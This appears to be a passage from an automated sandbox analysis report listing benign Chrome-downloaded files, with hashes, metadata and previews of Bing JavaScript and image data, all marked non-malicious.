                                                                                                    SHA-256:FBF7FE8197902B32CE2C83F05DB73255553C716AC7B084FF1878E617963D0F51
                                                                                                    SHA-512:E73B17A0CCAEA85C539B5DA3BA978EBDA519D68F5686894EBEBBB529DCA54D07CA3508DBCED9D8F56D71D49469FA5916A7255B6CA455E00251D81B5E03410E5C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.......\.......Gi...sPLTEGpL.e"..?..?..=........................uut.............O..K..J..J..K..K..J..J..M..O..S..O.uux.V..K.....ffffff.I.2..1..%q..>. Y.$d.BFBDDDDDDBGB.K...........K.$i.#a.DDDDDDDDDuww......!\.DDDDDDuwx.J.....\.$g. Z.CCCvvzvxywx{"^.CCCvwywx{vvwvvzwx{vwxxx|wx{wxzfff%.....$h.DDDCCC.h..[..x.._..S.vvx...9..._.%h.!`.DDD...AHAuwx.R..O.m.cK.}....U.g.c..N.Qs.X..]d..8..&.c...2.....$........#..e....'..h.vw.......XS..i........[..b.rC.H=www...zzz........T..................................J...................qqqqqqqqq.k..m.......413..................vvv....l.......uuu....m..................................................."........".."...\......tRNS..@..@.....` ...p.@.......p .``P.P_.........Z...0........p0_....P0....@@....... .p........"..R..@...0..0..... ...w...0..@.....X.......b.......... `......P@....p1`P.......=............p....D@..M.'.....0....Y.... .IDATx...Ub.@...S.ic.A.....E.....=%0s...^k"..S)..cff.U.en..".FS.Bm.j.m.....&.,.Y.0..........k.E.*U
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (1587), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1589
                                                                                                    Entropy (8bit):5.24528911504239
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:KyskFELbJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybibJnSE5aU93HGaQJWAiIh
                                                                                                    MD5:CB027BA6EB6DD3F033C02183B9423995
                                                                                                    SHA1:368E7121931587D29D988E1B8CB0FDA785E5D18B
                                                                                                    SHA-256:04A007926A68BB33E36202EB27F53882AF7FD009C1EC3AD7177FBA380A5FB96F
                                                                                                    SHA-512:6A575205C83B1FC3BFAC164828FBDB3A25EAD355A6071B7D443C0F8AB5796FE2601C48946C2E4C9915E08AD14106B4A01D2FCD534D50EA51C4BC88879D8BEC8D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var wln=wln||"",Identity;(function(n){function i(n){n.style.display="none";n.setAttribute("aria-hidden","true")}function r(n){n.style.display="inline-block";n.setAttribute("aria-hidden","false")}var u,t;n&&n.sglid&&n.setLoginPreference&&sj_be&&sj_cook&&sj_evt&&_d&&typeof _d.querySelectorAll!="undefined"&&(u=function(n){var i=n.getAttribute("data-a"),t=n.getAttribute("data-p");i==="false"&&t!=null&&sj_be(n,"click",function(){sj_cook.set("SRCHUSR","POEX",t,!0,"/")})},sj_evt.bind("identityHeaderShown",function(){var n=!1;sj_be(_ge("id_l"),"click",function(){var i,t;if(!n){for(i=_d.querySelectorAll(".b_imi"),t=0;t<i.length;t++)u(i[t]);n=!0}})},!0));sj_evt&&n&&(t=function(t){var h;if(t==null||t.idp!=="orgid"||(h=n.wlProfile(),h==null||h.name==null||t.name!=null)){var e=_ge("id_n"),u=_ge("id_p"),o=_ge("id_s"),s=_ge("id_a"),f=t?t.displayName:wln,c=t?t.img:null,l=t?t.idp:null,a=t?t.cid:null;e&&s&&(a||f)?(u&&c&&(u.title=f,u.src=c,r(u)),f.length>10&&(f=f.substring(0,10).replace(/\s+$/,"")+".")
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (371), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):4.964799787793963
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:qGD7/TMvKyYLwRMF4owANCqwvpkTzT6n0evROARDCMwzkk6Km0Msv/Gvz:JPwKVDJHCqspkZeZJDC/wKE
                                                                                                    MD5:B743465BB18A1BE636F4CBBBBD2C8080
                                                                                                    SHA1:7327BB36105925BD51B62F0297AFD0F579A0203D
                                                                                                    SHA-256:FEE47F1645BC40FBC0F98E05E8A53C4211F8081629FFDA2F785107C1F3F05235
                                                                                                    SHA-512:5592DEF225E34995F2F4E781F02CC2B489C66A7698D2FEFF9AC9A71F09E5284B6BBDB065E1DF9C06ADFB1F467D5627FBD06E647ABF4E6AB70CF34501232126AD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/cye7NhBZJb1Rti8Cl6_Q9XmgID0.js
                                                                                                    Preview:var SbiPrivacy;(function(){function t(){var i,r,t,u;if(typeof SbiUtil!="undefined"&&SbiUtil.rt&&_d.querySelectorAll)for(i=SbiUtil.rt.querySelectorAll(".sbiinflnk[data-link]"),r=function(t){var i=t.target;i.hasAttribute(n)&&(i.href=i.getAttribute(n),i.removeAttribute(n))},t=0;t<i.length;t++){u=i[t];SbiUtil.oncop(u,r)}}var n="data-link";t()})(SbiPrivacy||(SbiPrivacy={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2683), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2683
                                                                                                    Entropy (8bit):5.285209446790883
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5sksi0wg1S0h195DlYt/5ZS/wAtKciZIgDa4V8ahff/Z/92zBDZDNJC0x0M:yk1g1zbed3SBkdZ9ZGVFNJCRM
                                                                                                    MD5:FB797698EF041DD693AEE90FB9C13C7E
                                                                                                    SHA1:394194F8DD058927314D41E065961B476084F724
                                                                                                    SHA-256:795E9290718EB62A1FB00646DC738F6A6B715B1171DD54A3D2DEFA013A74F3DA
                                                                                                    SHA-512:E03C4AB727567BE95B349B971E29CFFB3890CFB1A1DDF997B34B9D69154294A00A5112F4FFCA4DF4E26BBF96AFA75E5943E965EDC8F8E21035ED2EF30B7688D8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var IPv6Tests;(function(n){function c(t){var r,c,o,l,f,s,i,a,v;try{if(y(),t==null||t.length==0)return;if(r=sj_cook.get(n.ipv6testcookie,n.ipv6testcrumb),r!=null&&r=="1"&&!u)return;if(c=sj_cook.get(n.ipv6testcookie,n.iptypecrumb),r!=null&&c&&u&&(o=Number(r),l=(new Date).getTime(),!window.isNaN(o)&&o>l))return;if(f=_d.getElementsByTagName("head")[0],!f)return;if(s="ipV6TestScript"+t,i=sj_ce("script",s),i.type="text/javascript",i.async=!0,i.onerror=function(){Log.Log("ipv6test","IPv6Test Dom_ "+t,"IPv6TestError",!1,"Error","JSONP call resulted in error.")},a=_ge(s),a&&f)return;f.insertBefore(i,f.firstChild);i.setAttribute("src",_w.location.protocol+"//"+t+".bing.com/ipv6test/test");e&&p();v=u?(new Date).getTime()+h:"1";sj_cook.set(n.ipv6testcookie,n.ipv6testcrumb,v.toString(),!1)}catch(w){Log.Log("ipv6test","Dom_ "+t,"IPv6TestError",!1,"Error","Failed to make JSONP call. Exception - "+w.message)}}function l(t){if(!t){Log.Log("ipv6test","IPv6TestResponseError","IPv6TestError",!1,"Error","G
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):100176
                                                                                                    Entropy (8bit):5.261353322138495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:52lqZD9U3kgqxpi2agfBDXykUUYDgXftll8bff1x71:5xZpskg6+g3UMvmHB
                                                                                                    MD5:DD5901E75623C17AD820EDD2765E4A08
                                                                                                    SHA1:61A92693904C69F32A7B058387EB9598D6456445
                                                                                                    SHA-256:AC893DA9C4476D0DF6B464F699DB3396AB4B22627A21C2E9C2EC6F5CF713D9EB
                                                                                                    SHA-512:498E01E586F2A8180BA56E102587291E9A1F319EDD583A8560ED1802A90F755B06A35ED670241D183B9A3F85AF269ACE732C280EF4FAF944F29C1B1EE26B102B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/Yakmk5BMafMqewWDh-uVmNZFZEU.js
                                                                                                    Preview:var AutoSuggest,sa_storage,EventKeyCodes,__extends,Bing,sa_inst;(function(n){var t;(function(n){var t,i,r,u,f,e;(function(n){n.User="SRCHHPGUSR"})(t=n.CookieNames||(n.CookieNames={})),function(n){n.AutoSuggest="AS"}(i=n.CrumbNames||(n.CrumbNames={})),function(n){n.CursorPosition="cp";n.ConversationId="cvid";n.SuggestionCount="sc";n.PartialQuery="pq";n.SuggestionPosition="sp";n.SuggestionType="qs";n.PreviewPaneSuggestionType="qsc";n.SkipValue="sk";n.PreviewPaneSkipValue="skc";n.Ghosting="ghc";n.Css="css";n.Count="count";n.DataSet="ds";n.SessionId="sid";n.TimeStamp="qt";n.Query="q";n.ImpressionGuid="ig";n.QFQuery="qry";n.BaseQuery="bq";n.FormCode="form";n.HashedMuid="nclid";n.RequestElToken="elvr";n.ElTokenValue="elv";n.AppId="appid";n.History="history";n.NoHistory="nohs";n.ApiTextDecoration="textdecorations";n.ClientId="clientid";n.Market="mkt";n.Scope="scope";n.CountryCode="cc";n.HomeGeographicRegion="hgr";n.SetLang="setlang";n.ZeroInputSerp="zis";n.GhShown="ghsh";n.GhAccepted="ghacc";
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 161 x 160, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3974
                                                                                                    Entropy (8bit):7.902382111689997
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ISobo+jDMIdb9KWszfIwrotnp7hVzMECexHrI1vuE2nvg5vzHJ3k:ISqo+jRAfTIwEtp7hy2HrA2vgNTVk
                                                                                                    MD5:2BE9B68EED69AE75FBA5ED982D0FF25D
                                                                                                    SHA1:BD6E134C0D87C52AC751555269A59796D5EABC55
                                                                                                    SHA-256:8281E85E9FF70034913A38D9EAA6AF52ED98AB621300F0558E70A9BCEFF7246E
                                                                                                    SHA-512:D72E1C8F52D65BBFE2ECDAF9E7A0C209F4F7C385B470DAB7C0979D3D5F1FF29EC14A5E92334676F560DFD22924B0FB983F43FB936EA23F812ED0C639896F8C60
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/qr-code-2be9b68eed.png
                                                                                                    Preview:.PNG........IHDR.............d.......pHYs.................sRGB.........gAMA......a.....IDATx...u.<..E......B.....X. ... ..T.........X.......G.qf...<..p..u..\[.W#9..zS|..9s...(.?..R.]..9...>..W.v..gR.yS..={...X..eYo9....0J....2.Fu....?..kW...../_..z......?.....}..UT../N..n..X{........Wn.L9.8.........+W..M...)....................r.q...k.....T.4Q7..j..nhcj.&:.*>ST?...q%.4....Fu.N...!.~........'F}.......Mt3D...l..v..B...1u9.`...|...b4.~B........9.Q.sB.:..x,.e;..(.......J2.....I..G.Uo.u....~.z........?...I:.T......9.@..??.?.8.e...N..M.N:!~H.i...q,yG.{^.../Zs26{r1.;a.....c{!...`Q.....EyY...u.%<.k2..1....K.......72.Q...n|.x<."V.{..........w'.W.G.&..L..q.5.'.(8|..kfQ....!....?....Fulf..........9......l.6....+7a..(.h...a0..&........D ....Wk...4.....hY;'....[a....".NSW3.T.&./....9....1}....S.a{d.e..)..c.:.J|..f..I....P.\.?..%._X'...4h...%.../^..K....@....J..[..I....../.....x.0..@.%.q?....k.'.i.R...p.`.Ks@......1'.=Md.b%..P..'.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (7083), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7083
                                                                                                    Entropy (8bit):5.288135136196839
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:oPC0FYuV4Ja/ikwCk9SoaZ8fWqVHgdKMBM/xVIU27KX3QC0UylwOCDk+h+16TN:afbh/eCLoaZBqhJQM/cxGnQC2Z+kYEqN
                                                                                                    MD5:0E84FCB6403B13A8458D66EBCF66E53B
                                                                                                    SHA1:2621AFA6DFB35A0392837505C3CDD0F5BB91E089
                                                                                                    SHA-256:02B0BD64A0FA50ED4655ADD6325858BA2BCDC33978DCD9D93F4B3C5EDDB05697
                                                                                                    SHA-512:9FBFD419ECFCE55444A4DEA65389204E2A19ECC325F31BEC3DC27683BE29AB94AEA1CF2374F0BC252D21A8856324788E146F3CD2E00983C2A312A0FADEA724E8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var LGWidget;(function(n){function rt(n,t,r,h,c,l,v,k,d,g,nt){var rt,tt,it,ft,ut,et;(h===void 0&&(h=!0),c===void 0&&(c=!1),l===void 0&&(l=!1),v===void 0&&(v=!0),k===void 0&&(k=0),d===void 0&&(d=!0),g===void 0&&(g=!1),nt===void 0&&(nt=!1),rt=n+"Container",tt=_ge(rt),c&&(tt=sj_ce("div",rt,"b_widgetContainer"),it=sj_ce("a",n+"CtaBtn","b_widgetCtaBtn"),ft=sj_ce("div",n+"Gradient","b_widgetGrad"),it.target="_blank",it.rel="noopener noreferrer",tt.appendChild(it),tt.appendChild(ft)),tt&&t)&&(r&&tt.insertBefore(r,tt.firstChild),l&&(i||f)?(f?e.insertBefore(tt,f):e.insertBefore(tt,i),sj_be(_w,"scroll",s(ot.bind(this,n,k),100))):(t.appendChild(tt),t.style.position="relative",p(n,t),b(n),v&&!o(t)?sj_be(_w,"scroll",s(w.bind(this,t,n,h),100)):(a(tt,h),u(n))),d&&sj_evt.fire(y,n,!0),g?(ut=_ge(n+"CtaBtn"),tt.style.cursor="pointer",sj_be(ut,"click",function(n){sj_sp(n)}),sj_be(tt,"click",function(){ut.click()})):nt&&(et=_ge(n+"CtaBtn").getAttribute("href"),tt.style.cursor="pointer",sj_be(tt,"click",fun
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):757
                                                                                                    Entropy (8bit):7.536965518428831
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/78sd3/+LDJR7O7arbiDoLmvt9HNjz+5t3riPKL0oFnyi1867I:852LChDB1y5tb30oFf37I
                                                                                                    MD5:56F08A996739A6937828640B4FB5B9CB
                                                                                                    SHA1:64D02C228BC617491629F0EC19D838633BEF1241
                                                                                                    SHA-256:C708B796E5530DDF8F1BA4DD1553A7209E14D28B6560608E48AD653674A7C57C
                                                                                                    SHA-512:681C77A2C48413F67659CDD24D175604918BA229B7C3370EECA80762043B66F86D24AABB40452EF6DCD47D4D33941865F00A4245EFEB534139B395C42279491D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR................a....gAMA......a.....pHYs..........#.u....tEXtSoftware.Adobe Fireworks CS6.....oIDAT8O...KTQ..".C}0...f..D/a.>...W.`..*....N.5..h..Xia...$M.....z4.'.R..s.>.9s....s......................"^...0..eP...x..U....l.B.K.D.p......./dW..,~.....)....`....{.A....,.c.. bA.Nn..H.....X.F`.Q.|...1q....zw%.~... .Nc.>..j...w@t..h...\..a.O... .. .N!}..k..l.h....S. [Jh^%........aN...m.q..,x.rh.l...A......-..Z.........e.=L.^.t..D...bWO.5rR7.\.....R.....0.a..(.)...<.F9.Sj..8]..+.xQ^q~.2^.s...d.........V`;..{.5.C.../I/.d.............'.^..E.n.v.......i...V2......p!.....n.......gi.l...,..RX..d^.........e.5.rXO...#;..c...j...9q>....o..$.....e0.`.@g......::N...k64H%..7....w....|.`<d.i.3.B6..?..?.S.%.....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1236), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1236
                                                                                                    Entropy (8bit):5.274615406899761
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:L3xRWZmoIQpaszpBXsbeKdAfilMso6zWevpoZQXulBuhL5xcMBJslvqsHAD9OW95:dwOjszXXsb9dALso6CeieXTuqslvqsgF
                                                                                                    MD5:2AB5F586948224AB662FBF84A5AA14D4
                                                                                                    SHA1:0DEA7AD6D167A668DAC5223770C1181617212FD0
                                                                                                    SHA-256:3CC647A2969085CFE0E526FC7F460AA5443057FD4D257C34E0BC099EE1F5492A
                                                                                                    SHA-512:02A7D528F3A97345300F63909DDCE8B0E73B5E7D3F4E3F4717EE6B3B8B1D75FD244AB9B132A04D4575E18F848117D8C667105CB0136E9C8E671B0068490A3779
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/Dep61tFnpmjaxSI3cMEYFhchL9A.js
                                                                                                    Preview:var AppSearchAjaxLoader;(function(n){function i(n){var i=n.getElementsByTagName("script"),t,u;if(i)for(t=0;t<i.length;t++)u=i[t],r(u)}function r(n){if(n){var t=sj_ce("script","");t.type="text/javascript";n.src?t.src=n.src:t.innerHTML=n.innerHTML;u(t)}}function u(n){_d.head.appendChild(n)}var t=function(){function n(n,t,i,r,u){this.failStr=n;this.logEvent=t;this.errClsName=i;this.loadClsName=r;this.successClsName=u}return n.prototype.loadAjaxData=function(n,t,r,u){var e=this,s,o,f;u===void 0&&(u=null);t&&(s=n.id+"_dynamic",o=sj_ce("div",s,this.loadClsName),n.innerHTML="",n.appendChild(o),f=sj_gx(),r||(r=""),t+=(t.indexOf("?")!=-1?"&":"?")+"IID="+r+"&IG="+_G.IG,f.open("GET",t,!0),sb_st(function(){f&&f.abort()},1e4),f.onreadystatechange=function(){var n;if(f!==null&&4===f.readyState){var r=f.status,t=f.responseText,s=!f.getAllResponseHeaders();if(f=null,n=200===r&&t!==null&&t!=="",o.className=n?e.successClsName:e.errClsName,o.innerHTML=n?t:e.failStr,n){n=!1;try{t&&(i(o),_w.rms&&_w.rms.sta
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):242
                                                                                                    Entropy (8bit):4.86807996961474
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:A909cpDUDUBDhR9c2p83QVhXANO09c8k9Au9c2pHn:AocpwDUBhfc2W3YXANvcpiMc2Bn
                                                                                                    MD5:6C2C6DB3832D53062D303CDFF5E2BD30
                                                                                                    SHA1:B7A064A64CEAE5C9009EF7D6D8F63B90D3933C9D
                                                                                                    SHA-256:06B77EE16A2CD34ACD210B4F2B6E423762EA8874BB26AE5A37DB9DD01A00FF70
                                                                                                    SHA-512:BC2D115B53035B700D727AF9D7EFAF32DD2A39A2344F3F5FA1A82586BE849EC7803E8320661E66AB7DD2A17E64B7897E95BBD84502B91997FA46EBA4E67E8C7D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/t6Bkpkzq5ckAnvfW2PY7kNOTPJ0.js
                                                                                                    Preview:function RewardsReportActivity(n){window.sj_rra&&sj_rra(n)}(function(){RewardsReportActivity(document.URL);sj_evt&&sj_evt.bind("acclink:updated",function(){typeof RewardsReportActivity!="undefined"&&RewardsReportActivity(document.URL)},1)})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1030 x 92, 8-bit colormap, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):9310
                                                                                                    Entropy (8bit):7.907965931624856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qnmErbd5SU2ipCfR6VY9Fcygr2XecqN4zvEd4xSNzvkmglkz80bl7xcnobmP:S5bdAU3EJiHpSucq+z64xSlp40Bx8oKP
                                                                                                    MD5:1947B15739221EB0DB271C1DD8F95E46
                                                                                                    SHA1:900C22BFD81CE073DF1D2537C54429D97AA6E700
                                                                                                    SHA-256:FBF7FE8197902B32CE2C83F05DB73255553C716AC7B084FF1878E617963D0F51
                                                                                                    SHA-512:E73B17A0CCAEA85C539B5DA3BA978EBDA519D68F5686894EBEBBB529DCA54D07CA3508DBCED9D8F56D71D49469FA5916A7255B6CA455E00251D81B5E03410E5C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png
                                                                                                    Preview:.PNG........IHDR.......\.......Gi...sPLTEGpL.e"..?..?..=........................uut.............O..K..J..J..K..K..J..J..M..O..S..O.uux.V..K.....ffffff.I.2..1..%q..>. Y.$d.BFBDDDDDDBGB.K...........K.$i.#a.DDDDDDDDDuww......!\.DDDDDDuwx.J.....\.$g. Z.CCCvvzvxywx{"^.CCCvwywx{vvwvvzwx{vwxxx|wx{wxzfff%.....$h.DDDCCC.h..[..x.._..S.vvx...9..._.%h.!`.DDD...AHAuwx.R..O.m.cK.}....U.g.c..N.Qs.X..]d..8..&.c...2.....$........#..e....'..h.vw.......XS..i........[..b.rC.H=www...zzz........T..................................J...................qqqqqqqqq.k..m.......413..................vvv....l.......uuu....m..................................................."........".."...\......tRNS..@..@.....` ...p.@.......p .``P.P_.........Z...0........p0_....P0....@@....... .p........"..R..@...0..0..... ...w...0..@.....X.......b.......... `......P@....p1`P.......=............p....D@..M.'.....0....Y.... .IDATx...Ub.@...S.ic.A.....E.....=%0s...^k"..S)..cff.U.en..".FS.Bm.j.m.....&.,.Y.0..........k.E.*U
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3263
                                                                                                    Entropy (8bit):7.905973125916112
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:CXHt+JcNgOSiS4XsAYNpf2ESNkWAuJOdZa:2oONgOLPXsAYnHWfyE
                                                                                                    MD5:21491E31CBFA17CCB55EF1B7AE5E2CCE
                                                                                                    SHA1:3E91D6385F34CD2EED6103772020DB3A1929C078
                                                                                                    SHA-256:BA51ED6AA031FF11F24FCF3325C5F42E37DCEFA222B537DAE955F97642385E37
                                                                                                    SHA-512:F9AD723461B5B971D7E89CBF4CFDB77F8FEA3E919C3712B352FE9E236205D04AA66FA1EAFDCB3CAEC09DB921B3E3C1313EA0A4CC5F102B262A8D383EB991C286
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?u=https%3a%2f%2fimg-s-msn-com.akamaized.net%2ftenant%2famp%2fentityid%2fAAqPeGY.img&ehk=rI0bNCT0Kyqs2%2fKunotlcfKPjbeFuSGDLIf%2fMaPwFBE%3d&w=16&h=16&o=6&pid=Wdp
                                                                                                    Preview:.PNG........IHDR................a....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (606), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):606
                                                                                                    Entropy (8bit):5.268639530160161
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:hc2AcBdEcv2Csu+IUhIlaq1YkOcAwI98NyeTgy8XTQHY2:hc2AcBSBZacr98XSDuY2
                                                                                                    MD5:0C2672DC05A52FBFB8E3BC70271619C2
                                                                                                    SHA1:9EDE9AD59479DB4BADB0BA19992620C3174E3E02
                                                                                                    SHA-256:54722CF65AB74A85441A039480691610DF079E6DD3316C452667EFE4A94FFD39
                                                                                                    SHA-512:DD2B3E4438A9DEAA6B306CBC0A50A035D9FE19C6180BC49D2A9D8CDBB2E25D9C6C8C5265C640AC362DC353169727F8C26503E11A8A061A2517A303F61D0CCD3C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rs/6r/x2/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w
                                                                                                    Preview:var sj_rra=function(n){var i="/rewardsapp/reportActivity",f=_w.location.search.substring(1),u=window.data_iid,r,t,e;i+=u&&u.length>0?"?IG="+_G.IG+"&IID="+u+"&"+f:"?"+f;r=window.rw_mqs_cg;r&&r.length>0&&(i+="&cg="+r,window.rw_mqs_cg=undefined);_w._H&&_w._H.mkt&&(i+="&src=hp");t=sj_gx();e="url="+escape(n)+"&V=web";t.open("POST",i,!0);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.onreadystatechange=function(){t&&t.readyState==4&&t.status==200&&t.responseText&&_w.sj_appHTML&&(sj_appHTML(document.body,t.responseText),sj_evt&&sj_evt.fire("serpThemeUpdatedByRewards"))};t.send(e)}
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, xresolution=86, yresolution=94, resolutionunit=2, software=GIMP 2.10.18, datetime=2020:04:16 19:04:38], progressive, precision 8, 160x160, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3791
                                                                                                    Entropy (8bit):7.08266375441937
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:6lg111b8TUEfN/R5Cx2ftlv8Zkj81vPZsYf:0g11u5FR5CUtlkZPRKY
                                                                                                    MD5:299A479A2F7F1F30D09545CA8CC5D162
                                                                                                    SHA1:871F9E79AD73AAD0B3E0AD1B5B6B87FE837B16CE
                                                                                                    SHA-256:B314EAD01E8E89C964273418BB1117D24DFE01E4838E7A1B46FA19F64699AF05
                                                                                                    SHA-512:9D8DA9F1247D5D097E8AAAB4346AADE12E2BC74D6F9446760A5A3A45D9C2D48782D456CE05AC6FD2F0572CD26A562F2D0E4C55048FDAEC138F398A715743437D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpg
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............V...........^...(...........1.......f...2.......t...i...............H.......H.......GIMP 2.10.18..2020:04:16 19:04:38.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ .........7.,acspMSFT...................................-lcms................................................desc... ...@cprt...`...6wtpt........chad.......,rXYZ........bXYZ........gXYZ........rTRC....... gTRC....... bTRC....... chrm...4...$dmnd...X...$dmdd...|...$mluc............enUS...$.....G.I.M.P. .b.u.i.l.t.-.i.n. .s.R.G.Bmluc............enUS.........P.u.b.l.i.c. .D.o.m.a.i.n..XYZ ...............-sf32.......B.......%.......................nXYZ ......o...8.....XYZ ......$.........XYZ ......b.........para..........ff......Y.......[chrm..............T|..L.......&g...\mluc............enUS.........G.I.M.Pmluc............enUS.........s.R.G.B...C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1833), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1833
                                                                                                    Entropy (8bit):5.03858600819449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Jk08PkQix8QboQO7cxfFb87c9nH40VtN3HCBuNDbHNxpA:sPb6oZY80tVbHDtTA
                                                                                                    MD5:D7365C424E30CB142A85B84C0618D671
                                                                                                    SHA1:7212FE88CD0686A381ACB1B0583A544AE3ADA1B0
                                                                                                    SHA-256:8FD0225B5F75EE2326ADC68A10F5B9FC50C30A45BF4B61C7EE9364103E6102C8
                                                                                                    SHA-512:26D9A5DA2CC591954C6014B4DE1826653C9F058E9C8287342D8F0F2C9960BDAF30E1D4F8ADDF529830327D94C8BCA21848A3ADAF2846036A5E9C618992B18D5F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/chL-iM0GhqOBrLGwWDpUSuOtobA.js
